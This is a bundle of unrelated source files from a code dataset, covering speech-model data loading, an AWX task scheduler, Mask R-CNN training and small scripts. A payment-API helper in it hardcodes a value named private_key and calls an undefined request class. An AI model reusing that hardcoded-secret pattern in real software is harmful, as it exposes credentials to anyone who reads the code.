int_tensor[char_index, ....]\n mel = self.get_mel(audiopath) # []\n if self.use_vae:\n if self.include_emo_emb:\n emoemb = self.get_emoemb(emoembpath)\n speaker = self.get_speaker(speaker, self.label_type)\n emotion = self.get_emotion(emotion, self.label_type)\n audioid = os.path.splitext(os.path.basename(audiopath))[0]\n return (text, mel, emoemb, speaker, emotion, dur, audioid)\n\n def get_mel(self, filename):\n if not self.load_mel_from_disk:\n audio, sampling_rate = load_wav_to_torch(filename)\n if sampling_rate != self.stft.sampling_rate:\n raise ValueError(\"{} SR doesn't match target {} SR\".format(\n sampling_rate, self.stft.sampling_rate))\n audio_norm = audio / self.max_wav_value\n audio_norm = audio_norm.unsqueeze(0)\n audio_norm = torch.autograd.Variable(audio_norm, requires_grad=False)\n melspec = self.stft.mel_spectrogram(audio_norm) # 1 X n_mel_channels X n_frames\n melspec = torch.squeeze(melspec, 0) # n_mel_channels X n_frames\n else:\n melspec = torch.from_numpy(np.load(filename))\n assert melspec.size(0) == self.stft.n_mel_channels, (\n 'Mel dimension mismatch: given {}, expected {}'.format(\n melspec.size(0), self.stft.n_mel_channels))\n\n return melspec\n\n def get_emoemb(self, filename):\n emoemb = torch.from_numpy(np.load(filename)).T\n assert emoemb.size(0) == self.emo_emb_dim, (\n 'Emotion embedding dimension mismatch: given {}, expected {}'.format(\n emoemb.size(0), self.emo_emb_dim))\n return emoemb\n\n def get_text(self, text):\n text_norm = torch.IntTensor(text_to_sequence(text, self.text_cleaners))\n return text_norm\n\n def create_lookup(self, audiopaths_and_text, attribute):\n a2i = {'speaker':-2, 'emotion':-1}\n ids = sorted(set(x[a2i[attribute]] for x in audiopaths_and_text))\n d = {ids[i]: i for i in range(len(ids))}\n return d\n\n def get_speaker(self, speaker, label_type='one-hot'):\n if label_type == 'one-hot':\n speaker_vector = np.zeros(self.n_speakers)\n speaker_vector[self.speaker_ids[speaker]] = 1\n output = torch.Tensor(speaker_vector.astype(dtype=np.float32))\n elif label_type == 'id':\n output = torch.tensor([self.speaker_ids[speaker]])\n return output\n\n def get_emotion(self, emotion, label_type='one-hot'):\n if label_type == 'one-hot':\n emotion_vector = np.zeros(self.n_emotions)\n emotion_vector[self.emotion_ids[emotion]] = 1\n output = torch.Tensor(emotion_vector.astype(dtype=np.float32))\n elif label_type == 'id':\n output = torch.tensor([self.emotion_ids[emotion]])\n return output\n\n def __getitem__(self, index):\n if self.pre_batching:\n audiopaths_and_text = self.audiopaths_and_text[index]\n pairs = [self.get_mel_text_pair(audiopath_and_text) for\n audiopath_and_text in audiopaths_and_text]\n else:\n pairs = self.get_mel_text_pair(self.audiopaths_and_text[index])\n return pairs\n\n def __len__(self):\n return len(self.audiopaths_and_text)\n\n\nclass TextMelCollate():\n \"\"\" Zero-pads model inputs and targets based on number of frames per step\n \"\"\"\n def __init__(self, hparams, pre_batching=False):\n self.pre_batching = pre_batching\n self.n_frames_per_step = hparams.n_frames_per_step\n self.label_type = hparams.label_type\n self.use_vae = hparams.use_vae\n\n def __call__(self, batch):\n \"\"\"Collate's training batch from normalized text and mel-spectrogram\n PARAMS\n ------\n batch: [[text_normalized, mel_normalized], ...]\n e.g.\n import itertools\n batch = list(itertools.islice(train_loader.dataset, hparams.batch_size))\n \"\"\"\n\n if self.pre_batching:\n batch = batch[0]\n\n # Right zero-pad all one-hot text sequences to max input length\n input_lengths, ids_sorted_decreasing = torch.sort(\n torch.LongTensor([len(x[0]) for x in batch]),\n dim=0, descending=True)\n max_input_len = input_lengths[0]\n\n text_padded = torch.LongTensor(len(batch), max_input_len)\n text_padded.zero_()\n for i in range(len(ids_sorted_decreasing)):\n text = batch[ids_sorted_decreasing[i]][0]\n text_padded[i, :text.size(0)] = text\n\n if self.use_vae:\n if self.label_type == 'one-hot':\n speakers = torch.LongTensor(len(batch), len(batch[0][3]))\n for i in range(len(ids_sorted_decreasing)):\n speaker = batch[ids_sorted_decreasing[i]][3]\n speakers[i, :] = speaker\n emotions = torch.LongTensor(len(batch), len(batch[0][4]))\n for i in range(len(ids_sorted_decreasing)):\n emotion = batch[ids_sorted_decreasing[i]][4]\n emotions[i, :] = emotion\n elif self.label_type == 'id':\n speakers = torch.LongTensor(len(batch))\n emotions = torch.LongTensor(len(batch))\n for i in range(len(ids_sorted_decreasing)):\n speakers[i] = batch[ids_sorted_decreasing[i]][3]\n emotions[i] = batch[ids_sorted_decreasing[i]][4]\n else:\n speakers = emotions = ''\n\n durs = [[] for _ in range(len(batch))]\n audioids = [[] for _ in range(len(batch))]\n for i in range(len(ids_sorted_decreasing)):\n durs[i] = batch[ids_sorted_decreasing[i]][5]\n audioids[i] = batch[ids_sorted_decreasing[i]][6]\n\n # Right zero-pad mel-spec\n num_mels = batch[0][1].size(0)\n max_target_len1 = max([x[1].size(1) for x in batch])\n\n if len(batch[0][2]) > 0:\n num_emoembs = batch[0][2].size(0)\n max_target_len2 = max([x[2].size(1) for x in batch])\n\n max_target_len = max_target_len1\n # todo: uniform wintime/hoptime of mel and emoemb so max_target_len will be the same\n\n # increment max_target_len to the multiples of n_frames_per_step\n if max_target_len % self.n_frames_per_step != 0:\n max_target_len += self.n_frames_per_step - max_target_len % self.n_frames_per_step\n assert max_target_len % self.n_frames_per_step == 0\n # todo: to support n_frames_per_step > 1\n\n # include mel padded and gate padded\n mel_padded = torch.FloatTensor(len(batch), num_mels, max_target_len)\n mel_padded.zero_()\n gate_padded = torch.FloatTensor(len(batch), max_target_len)\n gate_padded.zero_()\n output_lengths = torch.LongTensor(len(batch))\n for i in range(len(ids_sorted_decreasing)):\n mel = batch[ids_sorted_decreasing[i]][1]\n mel_padded[i, :, :mel.size(1)] = mel\n gate_padded[i, mel.size(1)-1:] = 1\n output_lengths[i] = mel.size(1)\n\n if len(batch[0][2]) > 0:\n emoemb_padded = torch.FloatTensor(len(batch), num_emoembs, max_target_len)\n emoemb_padded.zero_()\n for i in range(len(ids_sorted_decreasing)):\n emoemb = batch[ids_sorted_decreasing[i]][2]\n emoemb_nframes = min(emoemb.size(1), max_target_len)\n emoemb_padded[i, :, :emoemb_nframes] = emoemb[:, :emoemb_nframes]\n else:\n emoemb_padded = ''\n\n return text_padded, input_lengths, mel_padded, emoemb_padded, \\\n gate_padded, output_lengths, speakers, emotions, durs, audioids\n","sub_path":"data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":12797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"35598075","text":"# Embedded file name: /usr/lib/python2.6/site-packages/awx/main/management/commands/run_task_system.py\nimport os\nimport datetime\nimport logging\nimport signal\nimport time\nfrom django.conf import settings\nfrom django.core.management.base import NoArgsCommand\nfrom awx.main.models import *\nfrom awx.main.queue import FifoQueue\nfrom awx.main.tasks import handle_work_error\nfrom awx.main.utils import get_system_task_capacity\nfrom celery.task.control import inspect\nlogger = logging.getLogger('awx.main.commands.run_task_system')\nqueue = FifoQueue('tower_task_manager')\n\nclass SimpleDAG(object):\n \"\"\" A simple implementation of a directed acyclic graph \"\"\"\n\n def __init__(self):\n self.nodes = []\n self.edges = []\n\n def __contains__(self, obj):\n for node in self.nodes:\n if node['node_object'] == obj:\n return True\n\n return False\n\n def __len__(self):\n return len(self.nodes)\n\n def __iter__(self):\n return self.nodes.__iter__()\n\n def generate_graphviz_plot(self):\n\n def short_string_obj(obj):\n if type(obj) == Job:\n type_str = 'Job'\n if type(obj) == AdHocCommand:\n type_str = 'AdHocCommand'\n elif type(obj) == InventoryUpdate:\n type_str = 'Inventory'\n elif type(obj) == ProjectUpdate:\n type_str = 'Project'\n else:\n type_str = 'Unknown'\n type_str += '%s' % str(obj.id)\n return type_str\n\n doc = '\\n digraph g {\\n rankdir = LR\\n '\n for n in self.nodes:\n doc += '%s [color = %s]\\n' % (short_string_obj(n['node_object']), 'red' if n['node_object'].status == 'running' else 'black')\n\n for from_node, to_node in self.edges:\n doc += '%s -> %s;\\n' % (short_string_obj(self.nodes[from_node]['node_object']), short_string_obj(self.nodes[to_node]['node_object']))\n\n doc += '}\\n'\n gv_file = open('/tmp/graph.gv', 'w')\n gv_file.write(doc)\n gv_file.close()\n\n def add_node(self, obj, metadata = None):\n if self.find_ord(obj) is None:\n self.nodes.append(dict(node_object=obj, metadata=metadata))\n return\n\n def add_edge(self, from_obj, to_obj):\n from_obj_ord = self.find_ord(from_obj)\n to_obj_ord = self.find_ord(to_obj)\n if from_obj_ord is None or to_obj_ord is None:\n raise LookupError('Object not found')\n self.edges.append((from_obj_ord, to_obj_ord))\n return\n\n def add_edges(self, edgelist):\n for edge_pair in edgelist:\n self.add_edge(edge_pair[0], edge_pair[1])\n\n def find_ord(self, obj):\n for idx in range(len(self.nodes)):\n if obj == self.nodes[idx]['node_object']:\n return idx\n\n return None\n\n def get_node_type(self, obj):\n if type(obj) == Job:\n return 'job'\n if type(obj) == AdHocCommand:\n return 'ad_hoc_command'\n if type(obj) == InventoryUpdate:\n return 'inventory_update'\n if type(obj) == ProjectUpdate:\n return 'project_update'\n return 'unknown'\n\n def get_dependencies(self, obj):\n antecedents = []\n this_ord = self.find_ord(obj)\n for node, dep in self.edges:\n if node == this_ord:\n antecedents.append(self.nodes[dep])\n\n return antecedents\n\n def get_dependents(self, obj):\n decendents = []\n this_ord = self.find_ord(obj)\n for node, dep in self.edges:\n if dep == this_ord:\n decendents.append(self.nodes[node])\n\n return decendents\n\n def get_leaf_nodes(self):\n leafs = []\n for n in self.nodes:\n if len(self.get_dependencies(n['node_object'])) < 1:\n leafs.append(n)\n\n return leafs\n\n\ndef get_tasks():\n \"\"\"Fetch all Tower tasks that are relevant to the task management\n system.\n \"\"\"\n RELEVANT_JOBS = ('pending', 'waiting', 'running')\n graph_jobs = [ j for j in Job.objects.filter(status__in=RELEVANT_JOBS) ]\n graph_ad_hoc_commands = [ ahc for ahc in AdHocCommand.objects.filter(status__in=RELEVANT_JOBS) ]\n graph_inventory_updates = [ iu for iu in InventoryUpdate.objects.filter(status__in=RELEVANT_JOBS) ]\n graph_project_updates = [ pu for pu in ProjectUpdate.objects.filter(status__in=RELEVANT_JOBS) ]\n graph_system_jobs = [ sj for sj in SystemJob.objects.filter(status__in=RELEVANT_JOBS) ]\n all_actions = sorted(graph_jobs + graph_ad_hoc_commands + graph_inventory_updates + graph_project_updates + graph_system_jobs, key=lambda task: task.created)\n return all_actions\n\n\ndef rebuild_graph(message):\n \"\"\"Regenerate the task graph by refreshing known tasks from Tower, purging\n orphaned running tasks, and creating dependencies for new tasks before\n generating directed edge relationships between those tasks.\n \"\"\"\n if Instance.objects.my_role() == 'secondary':\n return\n else:\n inspector = inspect()\n if not hasattr(settings, 'IGNORE_CELERY_INSPECTOR'):\n active_task_queues = inspector.active()\n else:\n logger.warn('Ignoring celery task inspector')\n active_task_queues = None\n all_sorted_tasks = get_tasks()\n if not len(all_sorted_tasks):\n return\n active_tasks = []\n if active_task_queues is not None:\n for queue in active_task_queues:\n active_tasks += [ at['id'] for at in active_task_queues[queue] ]\n\n else:\n logger.error('Could not communicate with celery!')\n if not hasattr(settings, 'CELERY_UNIT_TEST'):\n return\n running_tasks = filter(lambda t: t.status == 'running', all_sorted_tasks)\n waiting_tasks = filter(lambda t: t.status != 'running', all_sorted_tasks)\n new_tasks = filter(lambda t: t.status == 'pending', all_sorted_tasks)\n logger.debug('Active celery tasks: ' + str(active_tasks))\n for task in list(running_tasks):\n if task.celery_task_id not in active_tasks and not hasattr(settings, 'IGNORE_CELERY_INSPECTOR'):\n task.status = 'failed'\n task.job_explanation += ' '.join(('Task was marked as running in Tower but was not present in', 'Celery, so it has been marked as failed.'))\n task.save()\n task.socketio_emit_status('failed')\n running_tasks.pop(running_tasks.index(task))\n logger.error('Task %s appears orphaned... marking as failed' % task)\n\n for task in new_tasks:\n logger.debug('Checking dependencies for: %s' % str(task))\n task_dependencies = task.generate_dependencies(running_tasks + waiting_tasks)\n logger.debug('New dependencies: %s' % str(task_dependencies))\n for dep in task_dependencies:\n time_delt = len(task_dependencies) - task_dependencies.index(dep)\n dep.created = task.created - datetime.timedelta(seconds=1 + time_delt)\n dep.status = 'waiting'\n dep.save()\n waiting_tasks.insert(waiting_tasks.index(task), dep)\n\n if not hasattr(settings, 'UNIT_TEST_IGNORE_TASK_WAIT'):\n task.status = 'waiting'\n task.save()\n\n graph = SimpleDAG()\n for task in running_tasks:\n graph.add_node(task)\n\n for wait_task in waiting_tasks[:50]:\n node_dependencies = []\n for node in graph:\n if wait_task.is_blocked_by(node['node_object']):\n node_dependencies.append(node['node_object'])\n\n graph.add_node(wait_task)\n for dependency in node_dependencies:\n graph.add_edge(wait_task, dependency)\n\n if settings.DEBUG:\n graph.generate_graphviz_plot()\n return graph\n\n\ndef process_graph(graph, task_capacity):\n \"\"\"Given a task dependency graph, start and manage tasks given their\n priority and weight.\n \"\"\"\n leaf_nodes = graph.get_leaf_nodes()\n running_nodes = filter(lambda x: x['node_object'].status == 'running', leaf_nodes)\n running_impact = sum([ t['node_object'].task_impact for t in running_nodes ])\n ready_nodes = filter(lambda x: x['node_object'].status != 'running', leaf_nodes)\n remaining_volume = task_capacity - running_impact\n logger.info('Running Nodes: %s; Capacity: %s; Running Impact: %s; Remaining Capacity: %s' % (str(running_nodes),\n str(task_capacity),\n str(running_impact),\n str(remaining_volume)))\n logger.info('Ready Nodes: %s' % str(ready_nodes))\n for task_node in ready_nodes:\n node_obj = task_node['node_object']\n impact = node_obj.task_impact\n if impact <= remaining_volume or running_impact == 0:\n node_dependencies = graph.get_dependents(node_obj)\n if graph.get_node_type(node_obj) == 'job':\n node_dependencies = []\n dependent_nodes = [{'type': graph.get_node_type(node_obj),\n 'id': node_obj.id}] + [ {'type': graph.get_node_type(n['node_object']),\n 'id': n['node_object'].id} for n in node_dependencies ]\n error_handler = handle_work_error.s(subtasks=dependent_nodes)\n start_status = node_obj.start(error_callback=error_handler)\n if not start_status:\n node_obj.status = 'failed'\n if node_obj.job_explanation:\n node_obj.job_explanation += ' '\n node_obj.job_explanation += 'Task failed pre-start check.'\n node_obj.save()\n continue\n remaining_volume -= impact\n running_impact += impact\n logger.info('Started Node: %s (capacity hit: %s) Remaining Capacity: %s' % (str(node_obj), str(impact), str(remaining_volume)))\n\n\ndef run_taskmanager():\n \"\"\"Receive task start and finish signals to rebuild a dependency graph\n and manage the actual running of tasks.\n \"\"\"\n\n def shutdown_handler():\n\n def _handler(signum, frame):\n signal.signal(signum, signal.SIG_DFL)\n os.kill(os.getpid(), signum)\n\n return _handler\n\n signal.signal(signal.SIGINT, shutdown_handler())\n signal.signal(signal.SIGTERM, shutdown_handler())\n paused = False\n task_capacity = get_system_task_capacity()\n last_rebuild = datetime.datetime.fromtimestamp(0)\n while True:\n message = queue.pop()\n if (datetime.datetime.now() - last_rebuild).seconds > 10:\n if message is not None and 'pause' in message:\n logger.info('Pause command received: %s' % str(message))\n paused = message['pause']\n graph = rebuild_graph(message)\n if not paused and graph is not None:\n process_graph(graph, task_capacity)\n last_rebuild = datetime.datetime.now()\n time.sleep(0.1)\n\n return\n\n\nclass Command(NoArgsCommand):\n \"\"\"Tower Task Management System\n This daemon is designed to reside between our tasks and celery and\n provide a mechanism for understanding the relationship between those tasks\n and their dependencies.\n \n It also actively prevents situations in which Tower can get blocked\n because it doesn't have an understanding of what is progressing through\n celery.\n \"\"\"\n help = 'Launch the Tower task management system'\n\n def handle_noargs(self, **options):\n try:\n run_taskmanager()\n except KeyboardInterrupt:\n pass","sub_path":"usr/lib/python2.6/site-packages/awx/main/management/commands/run_task_system.py","file_name":"run_task_system.py","file_ext":"py","file_size_in_byte":11610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"28088637","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport os\n\nos.chdir(\"/home/seugurlu/Desktop/SVN/trunk/estimering\") #Personal Comp - Virtual Comp Directory\n\n#Read the dataset and set hyperparameters\nmain_sample = pd.read_csv('data/raw/estimation_data.txt')\nmain_sample.rename(columns = {'Unnamed: 0' : 'hhid'}, inplace = True)\nmain_sample.to_hdf('./data/processed/main_sample', 'main_sample')\nnumber_hh = main_sample.shape[0]\nnumber_goods = len(main_sample.filter(regex = \"^p\").columns)\nnumber_bootstrap = 1000\n\n\"\"\"Generate Training/CV/Test Samples for bootstrap\"\"\"\nfor i in range(number_bootstrap):\n bootstrap_sample = main_sample.sample(frac = 1, replace = True, random_state = i)\n x_ = bootstrap_sample.iloc[:,1:number_goods+2].astype(np.float32)\n y_ = bootstrap_sample.iloc[:,number_goods+2:2*number_goods+2].astype(np.float32)\n x_train, x_test, y_train, y_test = train_test_split(x_, y_, test_size=0.30, random_state=(i+1)*number_bootstrap)\n x_cv, x_test, y_cv, y_test = train_test_split(x_test, y_test, test_size = 0.5, random_state = (i+1)*number_bootstrap + 1)\n save_name = 'bootstrap_sample'+str(i+1)\n bootstrap_sample.to_hdf('data/processed/'+save_name,'bootstrap_sample')\n x_.to_hdf('data/processed/'+save_name,'x_')\n y_.to_hdf('data/processed/'+save_name,'y_')\n x_train.to_hdf('data/processed/'+save_name,'x_train')\n y_train.to_hdf('data/processed/'+save_name,'y_train')\n x_cv.to_hdf('data/processed/'+save_name,'x_cv')\n y_cv.to_hdf('data/processed/'+save_name,'y_cv')\n x_test.to_hdf('data/processed/'+save_name,'x_test')\n y_test.to_hdf('data/processed/'+save_name,'y_test')","sub_path":"pycodes/data_design.py","file_name":"data_design.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"345331113","text":"\"\"\"\nleetcode 2021 March Challenge\nhttps://leetcode.com/explore/challenge/card/march-leetcoding-challenge-2021/591/week-4-march-22nd-march-28th/3687/\n\"\"\"\nfrom collections import defaultdict\n\nclass Solution:\n def originalDigits(self, s: str) -> str:\n answer = []\n # frequency map of character\n fmap = defaultdict(int)\n for c in s:\n fmap[c] += 1\n # more unique number would be checked first\n numbers = {\n \"0\" : \"zero\",\n \"6\" : \"six\",\n \"8\" : \"eight\",\n \"4\" : \"four\",\n \"7\" : \"seven\",\n \"2\" : \"two\",\n \"3\" : \"three\",\n \"1\" : \"one\",\n \"5\" : \"five\",\n \"9\" : \"nine\",\n }\n for nbr, alpha_nbr in numbers.items():\n # max frequency is 50000. because len(s) is up to 50000\n frequency = 50001\n for c in alpha_nbr:\n if c not in fmap or fmap[c] < 1:\n break\n frequency = min(frequency, s.count(c), fmap[c])\n else:\n answer.extend(nbr * frequency)\n for c in alpha_nbr:\n fmap[c] -= frequency\n return ''.join(sorted(answer))\n\nS = Solution()\nprint(S.originalDigits(\"owoztneoer\"))\nprint(S.originalDigits(\"fviefuro\"))\nprint(S.originalDigits(\"zeroonetwothreefourfivesixseveneightnine\"))","sub_path":"2021.03.28.py","file_name":"2021.03.28.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"650982907","text":"import base64\nimport bcrypt\nimport requests\nimport json\nimport random\nfrom applib.lib.helper import get_config\n\npublic_key='j6kHi1NXAOjrHFk0'\nprivate_key=\"XY1t9Y159hWJaETD\"\n\n\ndef hash_data(checksum):\n\tchecksum = checksum.encode(\"utf-8\")\n\tvalue = bcrypt.hashpw(checksum, bcrypt.gensalt())\n\n\tencodedBytes = base64.b64encode(value)\n\tencodedStr = str(encodedBytes, \"utf-8\")\n\treturn encodedStr\n\n\n\ndef merchant_details(login_id):\n\tchecksum = str(login_id) + \"|\" + private_key\n\tchecksum_data = hash_data(checksum)\n\n\turl = get_config('SERVICES', 'merchant')\n\n\tpayload = {'loginId': login_id, 'key': public_key, \n\t\t\t\t'checksum': checksum_data} \n\n\trh = RequestHandler(url, method=1, data=payload)\n\tretv = rh.send()\n\treturn retv \n\n\n\ndef requery_transaction(login_id, public_key, service_id):\n\trequest_id = random.randrange(10000000, 99999999)\n\n\turl = get_config('SERVICES', 'requery')\n\n\tpayload = {'loginId': login_id, 'key': public_key, 'requestId': request_id, \n\t\t\t\t'serviceId': service_id}\n\n\trh = RequestHandler(url, method=1, data=payload)\n\tretv = rh.send()\n\treturn retv\n\n\n\n ","sub_path":"api_services/api_lib.py","file_name":"api_lib.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"558843727","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.conf.urls import patterns\r\n\r\nurlpatterns = patterns('get_capacity.views',\r\n (r'^$', 'home'),\r\n # 表单下拉数据获取及渲染\r\n (r'^get_app/$', 'get_app'),\r\n (r'^get_ip_by_appid/$', 'get_ip_by_appid'),\r\n (r'^get_task_list/$', 'get_task_id_by_appid'),\r\n\r\n # 执行作业,获取容量数据\r\n (r'^execute_job/$', 'execute_job'),\r\n (r'^get_capacity/$', 'get_capacity'),\r\n)\r\n","sub_path":"get_capacity/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"174124831","text":"import os\nimport sys\nimport random\nimport math\nimport re\nimport time\nimport numpy as np\nimport cv2\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport scipy.io\n\nfrom config import Config\nimport utils\nimport model as modellib\nimport visualize\nfrom model import log\n\n#%matplotlib inline\n\n# Root directory of the project\nROOT_DIR = os.getcwd()\n\n# Directory to save logs and trained model\nMODEL_DIR = os.path.join(ROOT_DIR, \"logs.nosync\")\n\nCOCO_MODEL_PATH = os.path.join(ROOT_DIR, \"mask_rcnn_coco.h5.nosync\")\n\nclass ShapesConfig(Config):\n \"\"\"Configuration for training on the toy shapes dataset.\n Derives from the base Config class and overrides values specific\n to the toy shapes dataset.\n \"\"\"\n # Give the configuration a recognizable name\n NAME = \"layout\"\n\n # Train on 2 GPU and 4 images per GPU. We can put multiple images on each\n # GPU because the images are small. Batch size is 4 (GPUs * images/GPU).\n GPU_COUNT = len(os.environ['CUDA_VISIBLE_DEVICES'].split(','))\n IMAGES_PER_GPU = 8\n\n # Number of classes (including background)\n NUM_CLASSES = 1 + 11 # background + layouts\n\n # Use small images for faster training. Set the limits of the small side\n # the large side, and that determines the image shape.\n IMAGE_MIN_DIM = 128\n IMAGE_MAX_DIM = 128\n\n # Use smaller anchors because our image and objects are small\n RPN_ANCHOR_SCALES = (8, 16, 32, 64, 128) # anchor side in pixels\n\n # Reduce training ROIs per image because the images are small and have\n # few objects. Aim to allow ROI sampling to pick 33% positive ROIs.\n TRAIN_ROIS_PER_IMAGE = 32\n\n # Use a small epoch since the data is simple\n STEPS_PER_EPOCH = 100\n\n # use small validation steps since the epoch is small\n VALIDATION_STEPS = 5\n\nconfig = ShapesConfig()\nconfig.display()\n\n\nclass LayoutDataset(utils.Dataset):\n\n #load .mat layout information files:\n training_layout_info = {}\n validation_layout_info = {}\n training_mat = scipy.io.loadmat('layout/training.mat')\n for i in training_mat['training'].flatten():\n training_layout_info.update({i['image'][0]:{'scene':i['scene'][0],'type':i['type'][0][0],'point':i['point'],'resolution':i['resolution'][0]}})\n validation_mat = scipy.io.loadmat('layout/validation.mat')\n for i in validation_mat['validation'].flatten():\n validation_layout_info.update({i['image'][0]:{'scene':i['scene'][0],'type':i['type'][0][0],'point':i['point'],'resolution':i['resolution'][0]}})\n training_img_name_list = []\n validation_img_name_list = []\n test_img_name_list = []\n for i in os.listdir('layout/images'):\n if i[:-4] in training_layout_info.keys():\n training_img_name_list.append(i[:-4])\n elif i[:-4] in validation_layout_info.keys():\n validation_img_name_list.append(i[:-4])\n else: test_img_name_list.append(i[:-4])\n\n #set mask point size\n mask_point_size = 20\n\n def load_layouts(self,type):\n #11 kinds of layouts\n self.add_class(\"layouts\", 1, \"type0\")\n self.add_class(\"layouts\", 2, \"type1\")\n self.add_class(\"layouts\", 3, \"type2\")\n self.add_class(\"layouts\", 4, \"type3\")\n self.add_class(\"layouts\", 5, \"type4\")\n self.add_class(\"layouts\", 6, \"type5\")\n self.add_class(\"layouts\", 7, \"type6\")\n self.add_class(\"layouts\", 8, \"type7\")\n self.add_class(\"layouts\", 9, \"type8\")\n self.add_class(\"layouts\", 10, \"type9\")\n self.add_class(\"layouts\", 11, \"type10\")\n if type == 'training':\n for img_id in range(len(self.training_img_name_list)):\n img_name = self.training_img_name_list[img_id]\n img_info = self.get_info(img_name)\n self.add_image(\"layouts\", image_id=img_id, path=\n 'layout/images/'+img_name+'.jpg',\n name=img_name, scene=img_info['scene'],\n point=img_info['point'],\n resolution=img_info['resolution'],\n type=img_info['type'])\n else:\n for img_id in range(len(self.validation_img_name_list)):\n img_name = self.validation_img_name_list[img_id]\n img_info = self.get_info(img_name)\n self.add_image(\"layouts\", image_id=img_id, path=\n 'layout/images/'+img_name+'.jpg',\n name=img_name, scene=img_info['scene'],\n point=img_info['point'],\n resolution=img_info['resolution'],\n type=img_info['type'])\n\n def get_info(self, image_name):\n \"\"\"Input image_id, output layout info\"\"\"\n if image_name in self.validation_layout_info.keys():\n return self.validation_layout_info[image_name]\n elif image_name in self.training_layout_info.keys():\n return self.training_layout_info[image_name]\n else:\n print(\"image name doesn't exist\")\n return False\n\n def image_reference(self, image_id):\n \"\"\"Return the layouts data of the image.\"\"\"\n return self.image_info[image_id]\n\n def load_mask(self, image_id):\n info = self.image_info[image_id]\n class_ids = np.array([info['type'] + 1], dtype=np.int32)\n mask = np.resize(np.array([([0]*info['resolution'][1]) for i in range(info['resolution'][0])], dtype=np.uint8),(info['resolution'][0],info['resolution'][1],1))\n for point in info['point']:\n mask[max(0,int(point[1]-0.5)-int(self.mask_point_size/2)):\n min(info['resolution'][0],int(point[1]-0.5)+int(self.mask_point_size/2)),\n max(0,int(point[0]-0.5)-int(self.mask_point_size/2)):\n min(info['resolution'][1],int(point[0]-0.5)+int(self.mask_point_size/2)),0] = 1\n return mask, class_ids\n\n\ndataset_train = LayoutDataset()\ndataset_train.load_layouts('training')\ndataset_train.prepare()\ndataset_val = LayoutDataset()\ndataset_val.load_layouts('validation')\ndataset_val.prepare()\nmodel = modellib.MaskRCNN(mode=\"training\", config=config,\n model_dir=MODEL_DIR)\n\n# Which weights to start with?\ninit_with = \"last\" # imagenet, coco, or last\n\nif init_with == \"imagenet\":\n model.load_weights(model.get_imagenet_weights(), by_name=True)\nelif init_with == \"coco\":\n # Load weights trained on MS COCO, but skip layers that\n # are different due to the different number of classes\n # See README for instructions to download the COCO weights\n model.load_weights(COCO_MODEL_PATH, by_name=True,\n exclude=[\"mrcnn_class_logits\", \"mrcnn_bbox_fc\",\n \"mrcnn_bbox\", \"mrcnn_mask\"])\nelif init_with == \"last\":\n # Load the last model you trained and continue training\n model.load_weights(model.find_last()[1], by_name=True)\n\n#image_ids = np.random.choice(dataset_train.image_ids, 4)\n#for image_id in image_ids:\n# image = dataset_train.load_image(image_id)\n# mask, class_ids = dataset_train.load_mask(image_id)\n# visualize.display_top_masks(image, mask, class_ids, dataset_train.class_names)\n\n# Train the head branches\n# Passing layers=\"heads\" freezes all layers except the head\n# layers. You can also pass a regular expression to select\n# which layers to train by name pattern.\nmodel.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE,\n epochs=1,\n layers='heads')\n\nmodel.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE / 10,\n epochs=2,\n layers=\"all\")\n","sub_path":"kpd_last.py","file_name":"kpd_last.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"53762142","text":"from flask import Flask, render_template\nfrom day10.mydao_emp import DaoEmp\n\napp = Flask(__name__)\n \n@app.route('/emp')\ndef emp():\n de = DaoEmp()\n list = de.selectlist()\n return render_template('emp.html', list=list)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"HELLOPYTHON/day10/myflask06_crud.py","file_name":"myflask06_crud.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"368860970","text":"import seaborn as sns\nimport matplotlib.pyplot as plt\n\ntips = sns.load_dataset('tips')\ntips.head()\nsns.set_style('whitegrid')\nplt.figure(figsize = (12, 3))\nsns.countplot(x = 'sex', data = tips)\n\n\n\n\n","sub_path":"Python for Data Science and Machine Learning Bootcamp/Seaborn/Style and Color.py","file_name":"Style and Color.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"22535536","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\nrealUtility = np.loadtxt(\"D:\\document\\javaworkspace\\genetic\\GrealUtility.txt\")\npredictUtility = np.loadtxt(\"D:\\document\\javaworkspace\\genetic\\GpreUtility.txt\")\nmolecular = 0.0\ndenominator1 = 0.0\ndenominator2 = 0.0\ndenominator = 0.0\nfor i in range(len(realUtility)):\n molecular += (realUtility[i]-realUtility.mean()) * (predictUtility[i]-predictUtility.mean())\n denominator1 += np.square((realUtility[i]-realUtility.mean()))\n denominator2 += np.square((predictUtility[i]-predictUtility.mean()))\n \ndenominator = np.sqrt(denominator1*denominator2)\nperson = molecular/denominator\nprint(person) ","sub_path":"DrawGraph/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"411010937","text":"import os\nimport numpy as np\nimport warnings\nimport montepython.io_mp as io_mp\nfrom montepython.likelihood_class import Likelihood\nimport scipy.constants as 